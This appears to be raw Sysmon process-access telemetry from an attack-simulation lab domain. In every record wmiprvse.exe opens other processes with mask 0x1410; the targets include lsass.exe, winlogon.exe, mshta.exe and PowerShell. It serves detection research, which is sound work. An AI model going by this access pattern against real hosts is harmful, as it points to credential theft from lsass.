15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023404Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023403Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023402Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023401Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023400Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023399Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023398Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023397Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023396Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023395Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023394Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023393Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023392Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023391Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3706-00000000A301}5124C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023390Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023389Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023388Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023387Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023386Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023385Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 